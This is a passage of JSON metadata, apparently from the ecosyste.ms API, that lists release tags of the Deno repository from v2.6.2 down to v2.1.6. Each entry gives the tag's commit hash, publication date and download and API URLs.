2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","ta